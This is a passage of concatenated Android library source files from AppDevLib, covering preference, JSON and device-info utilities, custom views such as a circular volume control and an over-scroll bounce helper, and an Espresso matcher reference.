* withHint(...)
* withSpinnerText(...)
* hasLinks()
* hasEllipsizedText()
* HasMultilineTest()
*
* > UI Properties
* isDisplayed()
* isCompletelyDisplayed()
* isEnabled()
* hasFocus()
* isClickable()
* isChecked()
* isNotChecked()
* isSelected()
* isDisplayingAtLeast((0, 100]) 可见区域百分比匹配
* withEffectiveVisibility(...) 可见状态匹配
*
* > Object Matcher
* allOf(Matcher) 匹配所有Matcher
* anyOf(Matcher)
* is(...) 是匹配
* not(...) 否匹配
* endsWith(String)
* startWith(String)
* instanceOf(Class)
*
* > Hierarchy
* withParent(Matcher)
* withChild(Matcher)
* hasDescendant(Matcher)
* isDescendantOfA(Matcher) 是否包含子节点匹配
* hasSibling(Matcher) 是否包含兄弟节点匹配
* isRoot()
*
* > Input
* supportsInputMethods(...)
* hasIMEAction(...)
*
* > Class
* isAssignableFrom(...) 类型匹配
* withClassName(...) 类名匹配
*
* > Root Mathcers
* isFocusable() 是否获取焦点
 * isTouchable() 是否可触摸
* isDialog() 是否是窗口
* withDecorView()
* isPlatformPopup()
*
* > See Also
* Preference matcher
* Cursor matcher
* Layout matcher
*
* * ViewAssertions: 界面判断工具类
* >
* matches(Matcher)
* doesNotExist()
* selectDescendantsMatch(...)
*
* > LayoutAssertions
* noEllipsizedText(Matcher)
* noMultilineButtons()
* onOverlaps([Matcher])
*
* > Position Assertions
* isLeftOf(Matcher)
* isRightOf(Matcher)
* isAbove(Matcher)
* isBelow(Matcher)
* isLeftAlignedWith(Matcher)
* isRightAlignedWith(Matcher)
* isBottomAlignedWith()Matcher
* isTopAlignedWith(Matcher)
*
* * Intent Matchers:
* > Intent
* hasAction(...)
* hasCategories(...)
* hasComponent(...)
* hasExtra(...)
* hasExtras(Matcher)
* hasExtraWithKey(...)
* hasType(...)
* hasPackage()
* toPackage(String)
* hasFlag(int)
* hasFlags(...)
* isInternal()
* > Uri
* hasHost(...)
* hasPath(...)
* hasParamWithName(...)
* hasParamWithValue(...)
* hasScheme(...)
* hasSchemeSpecificPart(...)
* > Component Name
* hasClassName(...)
* hasPackageName(...)
* hasShortClassName(...)
* hasMyPackageName()
* > Bundle
* hasEntry(...)
* hasKey(...)
* hasValue(...)
*
* */
<file_sep>package com.icenler.lib.utils.helper;
import android.app.Application;
import android.content.Context;
import android.content.SharedPreferences;
import android.support.annotation.NonNull;
import android.text.TextUtils;

import com.icenler.lib.utils.Preconditions;

import java.util.Map;
import java.util.Set;

/**
 * Created by iCenler - 2015/7/17.
 * Description: SharedPreferences helper.
 * 1. Wraps the common put/get/remove/clear/contains operations.
 * 2. Works against a global default file, or any explicitly named file.
 */
public class SharedPrefsHelper {

    /** Default preferences file name; may be replaced via {@link #initPrefsConfig}. */
    private static String DEFAULT_CONFIG = "config";

    /** Application context used to resolve SharedPreferences instances. */
    private static Context mContext;

    private SharedPrefsHelper() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /**
     * Initializes the helper with the application context and an optional
     * default preferences file name. Must be called before any other method.
     *
     * @param app        the application, stored as the resolving context
     * @param configName default file name; ignored when null or empty
     */
    public static void initPrefsConfig(@NonNull Application app, String configName) {
        mContext = app;
        if (!TextUtils.isEmpty(configName))
            DEFAULT_CONFIG = configName;
    }

    /**
     * Stores a value in the default preferences file.
     *
     * @param key preference key
     * @param val value; must be String/Boolean/Float/Integer/Long/Set&lt;String&gt;
     * @param <T> value type
     * @throws IllegalArgumentException if the value type is unsupported
     */
    public static <T> void put(String key, @NonNull T val) {
        put(null, key, val);
    }

    /**
     * Stores a value in the given preferences file.
     *
     * @param configName target file name; null/empty selects the default file
     * @param key        preference key
     * @param val        value; must be String/Boolean/Float/Integer/Long/Set&lt;String&gt;
     * @param <T>        value type
     * @throws IllegalArgumentException if the value type is unsupported
     */
    public static <T> void put(String configName, String key, @NonNull T val) {
        SharedPreferences prefs = getSharedPrefs(configName);
        SharedPreferences.Editor edit = prefs.edit();

        if (val instanceof String) {
            edit.putString(key, (String) val);
        } else if (val instanceof Boolean) {
            edit.putBoolean(key, (Boolean) val);
        } else if (val instanceof Float) {
            edit.putFloat(key, (Float) val);
        } else if (val instanceof Integer) {
            edit.putInt(key, (Integer) val);
        } else if (val instanceof Long) {
            edit.putLong(key, (Long) val);
        } else if (val instanceof Set) {
            edit.putStringSet(key, (Set<String>) val);
        } else {
            // FIX: the exception was previously created but never thrown, so
            // unsupported values were silently dropped. Now mirrors get()'s
            // contract, which already threw for unsupported defaults.
            throw new IllegalArgumentException("No matching type value was found");
        }

        edit.apply(); // asynchronous write
    }

    /**
     * Reads a value from the default preferences file.
     *
     * @param key    preference key
     * @param defVal default value; its runtime type selects the accessor used
     * @param <T>    value type
     * @return the stored value, or {@code defVal} when absent
     */
    public static <T> T get(String key, @NonNull T defVal) {
        return get(null, key, defVal);
    }

    /**
     * Reads a value from the given preferences file.
     *
     * @param configName source file name; null/empty selects the default file
     * @param key        preference key
     * @param defVal     default value; its runtime type selects the accessor used
     * @param <T>        value type
     * @return the stored value, or {@code defVal} when absent
     * @throws IllegalArgumentException if the default's type is unsupported
     */
    public static <T> T get(String configName, String key, @NonNull T defVal) {
        SharedPreferences prefs = getSharedPrefs(configName);
        if (defVal instanceof String) {
            return (T) prefs.getString(key, (String) defVal);
        } else if (defVal instanceof Boolean) {
            return (T) Boolean.valueOf(prefs.getBoolean(key, (Boolean) defVal));
        } else if (defVal instanceof Float) {
            return (T) Float.valueOf(prefs.getFloat(key, (Float) defVal));
        } else if (defVal instanceof Integer) {
            return (T) Integer.valueOf(prefs.getInt(key, (Integer) defVal));
        } else if (defVal instanceof Long) {
            return (T) Long.valueOf(prefs.getLong(key, (Long) defVal));
        } else if (defVal instanceof Set) {
            return (T) prefs.getStringSet(key, (Set<String>) defVal);
        } else {
            throw new IllegalArgumentException("No matching type defVal was found");
        }
    }

    /**
     * @param key preference key
     * @return whether the default file contains the key
     */
    public static boolean contains(String key) {
        return getSharedPrefs().contains(key);
    }

    /**
     * @param configName source file name
     * @param key        preference key
     * @return whether the given file contains the key
     */
    public static boolean contains(String configName, String key) {
        return getSharedPrefs(configName).contains(key);
    }

    /**
     * Removes the entry for {@code key} from the default file.
     *
     * @param key preference key
     */
    public static void remove(String key) {
        getSharedPrefs().edit().remove(key).apply();
    }

    /**
     * Removes the entry for {@code key} from the given file.
     *
     * @param configName target file name
     * @param key        preference key
     */
    public static void remove(String configName, String key) {
        getSharedPrefs(configName).edit().remove(key).apply();
    }

    /**
     * @return all entries in the default file
     */
    public static Map<String, ?> getAll() {
        return getSharedPrefs().getAll();
    }

    /**
     * @param configName source file name
     * @return all entries in the given file
     */
    public static Map<String, ?> getAll(String configName) {
        return getSharedPrefs(configName).getAll();
    }

    /**
     * Clears every entry in the default file.
     */
    public static void clear() {
        getSharedPrefs().edit().clear().apply();
    }

    /**
     * Clears every entry in the given file.
     *
     * @param configName target file name
     */
    public static void clear(String configName) {
        getSharedPrefs(configName).edit().clear().apply();
    }

    /**
     * @return the default SharedPreferences file
     */
    public static SharedPreferences getSharedPrefs() {
        return getSharedPrefs(null);
    }

    /**
     * @param configName file name; null/empty selects the default file
     * @return the resolved SharedPreferences (MODE_PRIVATE)
     */
    public static SharedPreferences getSharedPrefs(String configName) {
        SharedPreferences prefs;
        if (!TextUtils.isEmpty(configName))
            prefs = mContext.getSharedPreferences(configName, Context.MODE_PRIVATE);
        else
            prefs = mContext.getSharedPreferences(DEFAULT_CONFIG, Context.MODE_PRIVATE);
        return prefs;
    }
}
<file_sep>package com.icenler.lib.feature.activity;
import android.content.Context;
import android.content.Intent;
import android.support.design.widget.CollapsingToolbarLayout;
import android.support.design.widget.CoordinatorLayout;
import android.support.v7.widget.Toolbar;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.TextView;

import com.icenler.lib.R;
import com.icenler.lib.utils.AppUtil;
import com.icenler.lib.utils.helper.ActivityHelper;
import com.icenler.lib.view.swiplayout.SwipeBackCompatActivity;

import butterknife.BindView;

/**
 * "About" screen: collapsing toolbar, app version label and a share action,
 * hosted inside a swipe-back container.
 */
public class AboutActivity extends SwipeBackCompatActivity {

    @BindView(R.id.toolbar)
    Toolbar mToolbar;
    @BindView(R.id.collapsing_toolbar)
    CollapsingToolbarLayout mToolbarLayout;
    @BindView(R.id.version_tv)
    TextView appVersion;
    @BindView(R.id.coordinator_layout)
    CoordinatorLayout mCoordinatorLayout;

    /** Launches this screen from any context. */
    public static void startMe(Context context) {
        context.startActivity(new Intent(context, AboutActivity.class));
    }

    @Override
    protected int doGetLayoutResId() {
        return R.layout.activity_about;
    }

    @Override
    protected void doInit() {
        // The title is set on the collapsing layout so it animates with scroll.
        mToolbarLayout.setTitle(getString(R.string.about_app));
        appVersion.setText(String.format("Version: %s", AppUtil.getAppVersionName(this)));
        setSupportActionBar(mToolbar);
        getSupportActionBar().setDisplayHomeAsUpEnabled(true);
    }

    @Override
    protected int getDefaultStatusBarTintColor() {
        return android.R.color.transparent;
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.menu_about, menu);
        return true;
    }

    @Override
    public boolean onOptionsItemSelected(MenuItem item) {
        final int itemId = item.getItemId();
        if (itemId == android.R.id.home) {
            finish();
            return true;
        }
        if (itemId == R.id.menu_share) {
            onClickShare();
            return true;
        }
        return super.onOptionsItemSelected(item);
    }

    /** Hands the project URL to the system share sheet. */
    public void onClickShare() {
        ActivityHelper.doShare(this, "分享", "https://github.com/Cenler/AppDevLib.git");
    }
}
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.content.res.TypedArray;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.graphics.Canvas;
import android.graphics.Paint;
import android.graphics.RectF;
import android.util.AttributeSet;
import android.view.MotionEvent;
import android.view.View;

import com.icenler.lib.R;
import com.icenler.lib.utils.ScreenUtil;

/**
 * Created by iCenler - 2015/5/11.
 * Description: circular volume-control widget — a ring of arc segments around
 * a center icon; swiping up/down on the view raises/lowers the filled count.
 */
public class VolumControlBar extends View {

    private static final int DEFAULT_VOLUM_REACHED_COLOR = 0xCF000000;
    private static final int DEFAULT_VOLUM_UNREACHED_COLOR = 0xCFFFFFFF;
    private static final int DEFAULT_VOLUM_DOT_COUNT = 12;
    private static final int DEFAULT_VOLUM_DOT_MARGIN = 8;
    private static final int DEFAULT_VOLUM_DOT_STROKE = 10;

    protected Paint mPaint;
    protected RectF mRectF;

    /** Color of segments at or below the current level. */
    protected int mVolumReachedColor = DEFAULT_VOLUM_REACHED_COLOR;
    /** Color of segments above the current level. */
    protected int mVolumUnReachedColor = DEFAULT_VOLUM_UNREACHED_COLOR;
    /** Total number of adjustable segments. */
    protected int mVolumDotCount = DEFAULT_VOLUM_DOT_COUNT;
    /** Angular gap between segments, in degrees. */
    protected int mVolumDotMargin = DEFAULT_VOLUM_DOT_MARGIN;
    /** Segment stroke width, in pixels. */
    protected int mVolumDotStroke = ScreenUtil.dp2px(DEFAULT_VOLUM_DOT_STROKE);
    /** Center icon; null when the `volum_src` attribute is not supplied. */
    protected Bitmap mVolumIcon;

    /** Touch-down Y coordinate. */
    private int xDown;
    /** Touch-up Y coordinate. */
    private int xUp;
    /** Currently filled segment count (default 3). */
    private int mCurrentDot = 3;

    public VolumControlBar(Context context) {
        this(context, null);
    }

    public VolumControlBar(Context context, AttributeSet attrs) {
        this(context, attrs, 0);
    }

    public VolumControlBar(Context context, AttributeSet attrs, int defStyle) {
        super(context, attrs, defStyle);
        init(attrs);
    }

    private void init(AttributeSet attrs) {
        getObtainStyledAttributes(attrs);
        mPaint = new Paint();
        mPaint.setAntiAlias(true);
        mRectF = new RectF();
    }

    @Override
    protected void onDraw(Canvas canvas) {
        mPaint.setStrokeWidth(mVolumDotStroke);
        mPaint.setStyle(Paint.Style.STROKE);
        mPaint.setStrokeCap(Paint.Cap.ROUND); // round caps on each arc segment

        float center = getWidth() * 0.5f;
        float radius = center - mVolumDotStroke;
        drawOval(canvas, center, radius); // draw the segment ring

        // FIX: the original dereferenced mVolumIcon unconditionally and threw
        // an NPE whenever the `volum_src` attribute was omitted.
        if (mVolumIcon == null)
            return;

        /*
         * Icon bounds: the square inscribed in the ring. With diameter D the
         * side X satisfies X² + X² = D², so X = (√2/2)·D = √2·radius.
         */
        mRectF.left = (float) (radius - Math.sqrt(2) * 0.5f * radius + mVolumDotStroke);
        mRectF.top = (float) (radius - Math.sqrt(2) * 0.5f * radius + mVolumDotStroke);
        mRectF.bottom = (float) (mRectF.left + Math.sqrt(2) * radius);
        mRectF.right = (float) (mRectF.left + Math.sqrt(2) * radius);

        // Icons smaller than the inscribed square are centered instead of
        // being stretched to fill it.
        if (mVolumIcon.getWidth() < Math.sqrt(2) * radius) {
            mRectF.left = (float) (mRectF.left + Math.sqrt(2) * radius * 0.5f - mVolumIcon.getWidth() * 0.5f);
            mRectF.top = (float) (mRectF.top + Math.sqrt(2) * radius * 0.5f - mVolumIcon.getHeight() * 0.5f);
            mRectF.right = mRectF.left + mVolumIcon.getWidth();
            mRectF.bottom = mRectF.top + mVolumIcon.getHeight();
        }
        canvas.drawBitmap(mVolumIcon, null, mRectF, mPaint);
    }

    /**
     * Draws the ring of arc segments: the unreached color first, then the
     * first {@code mCurrentDot} segments on top in the reached color.
     *
     * @param canvas target canvas
     * @param centre ring center (the view is assumed square)
     * @param radius ring radius
     */
    private void drawOval(Canvas canvas, float centre, float radius) {
        // Sweep per segment: divide the margins out of the full 360 degrees.
        float itemSize = (360 * 1.0f - mVolumDotCount * mVolumDotMargin) / mVolumDotCount;
        RectF oval = new RectF(centre - radius, centre - radius, centre + radius, centre + radius); // arc bounds

        mPaint.setColor(mVolumUnReachedColor); // background segments
        for (int i = 0; i < mVolumDotCount; i++) {
            // -90 starts the first segment at 12 o'clock.
            canvas.drawArc(oval, i * (itemSize + mVolumDotMargin) - 90, itemSize, false, mPaint);
        }

        mPaint.setColor(mVolumReachedColor); // filled segments up to the level
        for (int i = 0; i < mCurrentDot; i++) {
            canvas.drawArc(oval, i * (itemSize + mVolumDotMargin) - 90, itemSize, false, mPaint);
        }
    }

    /**
     * Reads the styled attributes declared in R.styleable.VolumControlBar.
     *
     * @param attrs the XML attribute set (may be null)
     */
    private void getObtainStyledAttributes(AttributeSet attrs) {
        TypedArray array = getContext().obtainStyledAttributes(attrs, R.styleable.VolumControlBar);
        // FIX: iterate getIndexCount() — the number of attributes actually
        // set — instead of length(); TypedArray.getIndex(i) is only defined
        // for indices below getIndexCount().
        int count = array.getIndexCount();
        for (int i = 0; i < count; i++) {
            int index = array.getIndex(i);
            switch (index) {
                case R.styleable.VolumControlBar_volum_reached_color:
                    mVolumReachedColor = array.getColor(index, mVolumReachedColor);
                    break;
                case R.styleable.VolumControlBar_volum_unreached_color:
                    mVolumUnReachedColor = array.getColor(index, mVolumUnReachedColor);
                    break;
                case R.styleable.VolumControlBar_volum_src:
                    mVolumIcon = BitmapFactory.decodeResource(getResources(), array.getResourceId(index, 0));
                    break;
                case R.styleable.VolumControlBar_volum_dot_count:
                    mVolumDotCount = array.getInteger(index, mVolumDotCount);
                    break;
                case R.styleable.VolumControlBar_volum_dot_stroke:
                    mVolumDotStroke = array.getDimensionPixelSize(index, mVolumDotStroke);
                    break;
                case R.styleable.VolumControlBar_volum_dot_margin:
                    mVolumDotMargin = array.getInteger(index, mVolumDotMargin);
                    break;
                default:
                    break;
            }
        }
        array.recycle();
    }

    /**
     * Increments the level by one, capped at {@link #mVolumDotCount}.
     */
    public void handleUp() {
        if (mCurrentDot != mVolumDotCount) {
            mCurrentDot++;
            postInvalidate();
        }
    }

    /**
     * Decrements the level by one, floored at zero.
     */
    public void handleDown() {
        if (mCurrentDot != 0) {
            mCurrentDot--;
            postInvalidate();
        }
    }

    @Override
    public boolean onTouchEvent(MotionEvent event) {
        switch (event.getAction()) {
            case MotionEvent.ACTION_DOWN:
                xDown = (int) event.getY();
                break;
            case MotionEvent.ACTION_UP:
                xUp = (int) event.getY();
                // Downward swipe lowers the level; upward raises it.
                if (xUp > xDown)
                    handleDown();
                else
                    handleUp();
                break;
        }
        return true;
    }
}
<file_sep>package com.icenler.lib.view.damp_spring;
import android.support.annotation.IntDef;
import android.support.v4.view.ViewPager;
import android.support.v7.widget.GridLayoutManager;
import android.support.v7.widget.LinearLayoutManager;
import android.support.v7.widget.RecyclerView;
import android.support.v7.widget.StaggeredGridLayoutManager;
import android.view.View;
import android.widget.GridView;
import android.widget.HorizontalScrollView;
import android.widget.ListView;
import android.widget.ScrollView;

import com.icenler.lib.view.damp_spring.adapters.AbsListViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.HorizontalScrollViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.RecyclerViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.ScrollViewOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.StaticOverScrollDecorAdapter;
import com.icenler.lib.view.damp_spring.adapters.ViewPagerOverScrollDecorAdapter;

import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

/**
 * Created by iCenler - 2016/7/5.
 * Description: convenience factory that attaches a damped-spring ("bounce")
 * over-scroll effect to the common scrollable Android widgets.
 */
public class OverScrollDecoratorHelper {

    public static final int ORIENTATION_VERTICAL = 0;
    public static final int ORIENTATION_HORIZONTAL = 1;

    @IntDef({ORIENTATION_VERTICAL, ORIENTATION_HORIZONTAL})
    @Target(ElementType.PARAMETER)
    @Retention(RetentionPolicy.SOURCE)
    public @interface ORIENTATION {
    }

    /**
     * Decorates a {@link RecyclerView} with the over-scroll effect.
     * <br/>Only recycler-views backed by the <b>native</b> layout managers
     * ({@link LinearLayoutManager}, {@link GridLayoutManager},
     * {@link StaggeredGridLayoutManager}) are supported by this method.
     *
     * @param recyclerView the view to decorate
     * @param orientation  {@link #ORIENTATION_HORIZONTAL} or {@link #ORIENTATION_VERTICAL}
     * @return the effect 'decorator', enabling further configuration
     */
    public static IOverScrollDecor setUpOverScroll(RecyclerView recyclerView, @ORIENTATION int orientation) {
        if (orientation == ORIENTATION_HORIZONTAL) {
            return new HorizontalOverScrollBounceEffectDecorator(new RecyclerViewOverScrollDecorAdapter(recyclerView));
        }
        if (orientation == ORIENTATION_VERTICAL) {
            return new VerticalOverScrollBounceEffectDecorator(new RecyclerViewOverScrollDecorAdapter(recyclerView));
        }
        throw new IllegalArgumentException("orientation");
    }

    /** Vertical over-scroll for a plain {@link ListView}. */
    public static IOverScrollDecor setUpOverScroll(ListView listView) {
        return new VerticalOverScrollBounceEffectDecorator(new AbsListViewOverScrollDecorAdapter(listView));
    }

    /** Vertical over-scroll for a {@link GridView}. */
    public static IOverScrollDecor setUpOverScroll(GridView gridView) {
        return new VerticalOverScrollBounceEffectDecorator(new AbsListViewOverScrollDecorAdapter(gridView));
    }

    /** Horizontal over-scroll for a {@link ViewPager}. */
    public static IOverScrollDecor setUpOverScroll(ViewPager viewPager) {
        return new HorizontalOverScrollBounceEffectDecorator(new ViewPagerOverScrollDecorAdapter(viewPager));
    }

    /** Vertical over-scroll for a {@link ScrollView}. */
    public static IOverScrollDecor setUpOverScroll(ScrollView scrollView) {
        return new VerticalOverScrollBounceEffectDecorator(new ScrollViewOverScrollDecorAdapter(scrollView));
    }

    /** Horizontal over-scroll for a {@link HorizontalScrollView}. */
    public static IOverScrollDecor setUpOverScroll(HorizontalScrollView scrollView) {
        return new HorizontalOverScrollBounceEffectDecorator(new HorizontalScrollViewOverScrollDecorAdapter(scrollView));
    }

    /**
     * Decorates a generic view that is assumed to always be over-scroll ready
     * (e.g. a plain text field or image view).
     *
     * @param view        the view to decorate
     * @param orientation {@link #ORIENTATION_HORIZONTAL} or {@link #ORIENTATION_VERTICAL}
     * @return the effect 'decorator', enabling further configuration
     */
    public static IOverScrollDecor setUpStaticOverScroll(View view, @ORIENTATION int orientation) {
        if (orientation == ORIENTATION_HORIZONTAL) {
            return new HorizontalOverScrollBounceEffectDecorator(new StaticOverScrollDecorAdapter(view));
        }
        if (orientation == ORIENTATION_VERTICAL) {
            return new VerticalOverScrollBounceEffectDecorator(new StaticOverScrollDecorAdapter(view));
        }
        throw new IllegalArgumentException("orientation");
    }
}
<file_sep># AppDevLib
Android 开发常用工具库<file_sep>>>> 说明:
此包下的布局为Google官方百分比布局类型的扩展,可指定相对宽高百分比设置布局大小,从根本上解决了屏幕适配问题
>>> 使用:(具体参考:https://github.com/hongyangAndroid/android-percent-support-extend)
- 支持属性:
app:layout_widthPercent
app:layout_heightPercent
app:layout_marginPercent
app:layout_marginLeftPercent
app:layout_marginTopPercent
app:layout_marginRightPercent
app:layout_marginBottomPercent
app:layout_marginStartPercent
app:layout_marginEndPercent
app:layout_maxWidthPercent
app:layout_maxHeightPercent
app:layout_minWidthPercent
app:layout_minWidthPercent
app:layout_paddingPercent
app:layout_paddingBottomPercent="8%w"
app:layout_paddingLeftPercent="2%w"
app:layout_paddingRightPercent="4%w"
app:layout_paddingTopPercent="6%w"
app:layout_textSizePercent
- sample:
<TextView
android:layout_width="0dp"
android:layout_height="0dp"
android:layout_gravity="left|top"
android:background="#44ff0000"
android:text="width:30%,height:20%"
app:layout_heightPercent="20%"
android:gravity="center"
app:layout_widthPercent="30%"/>
app:layout_heightPercent="50%w"
app:layout_marginPercent="15%w"
app:layout_marginBottomPercent="20%h"<file_sep>package com.icenler.lib.utils;
import android.support.annotation.NonNull;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;

import java.util.List;

/**
 * Created by iCenler - 2015/9/9.
 * Description: thin static wrapper around fastjson for (de)serialization.
 */
public class JsonUtil {

    private JsonUtil() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /**
     * Deserializes a JSON object string into an instance of the given class.
     *
     * @param json  JSON source text
     * @param clazz target type
     * @return the populated instance
     */
    public static <T> T parseJson2Obj(String json, @NonNull Class<T> clazz) {
        return JSON.parseObject(json, clazz);
    }

    /**
     * Serializes the given object to its JSON representation.
     *
     * @param obj object to serialize
     * @return JSON text
     */
    public static String parseObj2Json(Object obj) {
        return JSON.toJSONString(obj);
    }

    /**
     * Deserializes a JSON array string into a typed list.
     *
     * @param json  JSON source text
     * @param clazz element type
     * @return list of populated elements
     */
    public static <T> List<T> parseJson2List(String json, @NonNull Class<T> clazz) {
        return JSON.parseArray(json, clazz);
    }

    /**
     * Extracts the raw string value stored under {@code key} in a JSON object.
     *
     * @param json JSON source text
     * @param key  member name to read
     * @return the member's string value, or null when the source is unparsable
     */
    public static String getJson2String(String json, String key) {
        final JSONObject parsed = JSON.parseObject(json);
        if (parsed == null) {
            return null;
        }
        return parsed.getString(key);
    }
}
<file_sep>package com.icenler.lib.feature;
import android.graphics.Typeface;

import com.icenler.lib.BuildConfig;
import com.icenler.lib.utils.AppUtil;

/**
 * Created by iCenler - 2015/7/17.
 * Description: global application configuration constants.
 */
public class Constants {

    // Debug switch, mirrors the build-type flag.
    public static boolean DEBUG = BuildConfig.DEBUG;

    /* SharedPreferences keys */
    public static String PREFS_DEVICE_ID = "device_id";
    public static String PREFS_UUID = "device_uuid";
    public static String PREFS_MAC_ADDRESS = "mac_address";

    /* Config Params */
    // NOTE(review): despite the name, this holds the app *version name*
    // (AppUtil.getAppVersionName), not the application label — confirm intent.
    public static String APP_NAME = AppUtil.getAppVersionName(App.getInstance());

    /* Font Typeface (loaded lazily; see the commented template below) */
    public static Typeface FZHHJT;  // FangZheng XingHei (Chinese display font)
    public static Typeface MIUI_EN; // MIUI Latin font
    public static Typeface MIUI_CN; // MIUI Chinese font
    public static Typeface FA_ICON; // Font-Awesome icon font
    public static Typeface AGENCY;  // decorative font

    static {
        // Font initialization template, kept for reference:
        // AssetManager assets = BaseApplication.getInstance().getAssets();
        // FZHHJT = Typeface.createFromAsset(assets, "fonts/fangzhengjianti.ttf");
        // MIUI_EN = Typeface.createFromAsset(assets, "fonts/Roboto-Regular.ttf");
        // MIUI_CN = Typeface.createFromAsset(assets, "fonts/DroidSansFallback.ttf");
        // FA_ICON = Typeface.createFromAsset(assets, "fonts/fontawesome-webfont.ttf");
    }
}
<file_sep>package com.icenler.lib.view.dialog;
import android.app.DialogFragment;
import android.app.FragmentManager;

/**
 * Created by iCenler - 2015/4/14.
 * Description: singleton-style wrapper around the prompt dialog fragment.
 */
public class PromptDialog {

    private static DialogFragment mPromptDialog;

    /** @return the currently tracked dialog instance, or null */
    public static DialogFragment getDialog() {
        return mPromptDialog;
    }

    /**
     * Shows the prompt unless one is already visible. Any failure is logged
     * and the tracked reference is reset.
     *
     * @param fm fragment manager used to attach the dialog
     */
    public static void show(FragmentManager fm) {
        try {
            final boolean alreadyShowing = mPromptDialog != null && mPromptDialog.isVisible();
            if (!alreadyShowing) {
                mPromptDialog = CustonPromptView.createDialog();
                mPromptDialog.show(fm, "Prompt_Dialog");
            }
        } catch (Exception e) {
            e.printStackTrace();
            mPromptDialog = null;
        }
    }

    /**
     * Dismisses the prompt if one is tracked; always clears the reference.
     */
    public static void dismiss() {
        try {
            if (mPromptDialog != null) {
                mPromptDialog.dismiss();
            }
            mPromptDialog = null;
        } catch (Exception e) {
            e.printStackTrace();
            mPromptDialog = null;
        }
    }
}
<file_sep>package com.icenler.lib.utils;
import android.app.ActivityManager;
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.Environment;
import android.os.StatFs;
import android.provider.Settings;
import android.telephony.TelephonyManager;
import android.text.TextUtils;
import android.text.format.Formatter;

import com.icenler.lib.feature.Constants;
import com.icenler.lib.utils.helper.SharedPrefsHelper;

import org.json.JSONObject;

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.NetworkInterface;
import java.net.SocketException;
import java.net.URL;
import java.util.Enumeration;
import java.util.List;
import java.util.UUID;

/**
 * Created by iCenler - 2015/7/14.
 * Description: common Android helpers — app/package info, device identifiers,
 * network addresses and storage queries.
 */
public class AppUtil {

    private AppUtil() {
        throw new UnsupportedOperationException("cannot be instantiated");
    }

    /**
     * @param context any context
     * @return the app's versionCode, or -1 when the package cannot be resolved
     */
    public static int getAppVersionCode(Context context) {
        PackageInfo info;
        int versionCode = -1;
        try {
            info = context.getPackageManager().getPackageInfo(context.getPackageName(), 0);
            versionCode = info.versionCode;
        } catch (PackageManager.NameNotFoundException e) {
            // best-effort: keep the -1 fallback for the app's own package
        }
        return versionCode;
    }

    /**
     * @param context any context
     * @return the app's versionName, or "" when the package cannot be resolved
     */
    public static String getAppVersionName(Context context) {
        PackageInfo info;
        String versionName = "";
        try {
            info = context.getPackageManager().getPackageInfo(context.getPackageName(), 0);
            versionName = info.versionName;
        } catch (PackageManager.NameNotFoundException e) {
            // best-effort: keep the "" fallback
        }
        return versionName;
    }

    /**
     * @param context any context
     * @return the application label, or "" on failure
     */
    // FIX: was an instance method, but the private constructor throws, so it
    // could never be invoked; made static like every other helper here.
    // (Static methods remain source-compatible with instance-style calls.)
    public static String getAppName(Context context) {
        String applicationName = "";
        PackageManager packageManager;
        ApplicationInfo applicationInfo;
        try {
            packageManager = context.getPackageManager();
            applicationInfo = packageManager.getApplicationInfo(context.getPackageName(), 0);
            applicationName = (String) packageManager.getApplicationLabel(applicationInfo);
        } catch (Exception e) {
            // best-effort: keep the "" fallback
        }
        return applicationName;
    }

    /**
     * Checks whether a service with the given class name is currently running.
     *
     * @param context   any context
     * @param className fully-qualified service class name
     * @return true when a running service matches
     */
    public static boolean isServiceRunning(Context context, String className) {
        ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
        List<ActivityManager.RunningServiceInfo> servicesList = activityManager.getRunningServices(Integer.MAX_VALUE);
        for (ActivityManager.RunningServiceInfo si : servicesList) {
            if (className.equals(si.service.getClassName())) {
                return true;
            }
        }
        return false;
    }

    /**
     * Not available on non-telephony devices (requires READ_PHONE_STATE).
     *
     * @param context any context
     * @return the telephony device ID, or null when unavailable
     */
    public static String getDeviceID(Context context) {
        TelephonyManager telMgr = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
        return telMgr != null ? telMgr.getDeviceId() : null;
    }

    /**
     * @param context any context
     * @return the SIM card serial number, or null when unavailable
     */
    public static String getSimSerialNumber(Context context) {
        TelephonyManager telMgr = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
        return telMgr != null ? telMgr.getSimSerialNumber() : null;
    }

    /**
     * Note: this value is reset by a factory reset or re-flash.
     *
     * @param context any context
     * @return the ANDROID_ID settings value
     */
    public static String getAndroidID(Context context) {
        return Settings.Secure.getString(context.getContentResolver(), Settings.Secure.ANDROID_ID);
    }

    /**
     * Unavailable on devices without Wi-Fi/Bluetooth hardware. The value is
     * cached in shared preferences after the first successful read.
     *
     * @param context any context
     * @return the Wi-Fi MAC address, or "" when it cannot be determined
     */
    public static String getMacAddress(Context context) {
        String macAddress = SharedPrefsHelper.get(Constants.PREFS_MAC_ADDRESS, "");
        if (TextUtils.isEmpty(macAddress)) {
            WifiManager wifiMgr = (WifiManager) context.getSystemService(Context.WIFI_SERVICE);
            if (null != wifiMgr) {
                WifiInfo info = wifiMgr.getConnectionInfo();
                if (null != info) {
                    macAddress = info.getMacAddress();
                    SharedPrefsHelper.put(Constants.PREFS_MAC_ADDRESS, macAddress);
                }
            }
        }
        return macAddress;
    }

    /**
     * Returns a stable pseudo-unique identifier derived from ANDROID_ID when
     * usable, cached in shared preferences after first generation.
     *
     * @param context any context
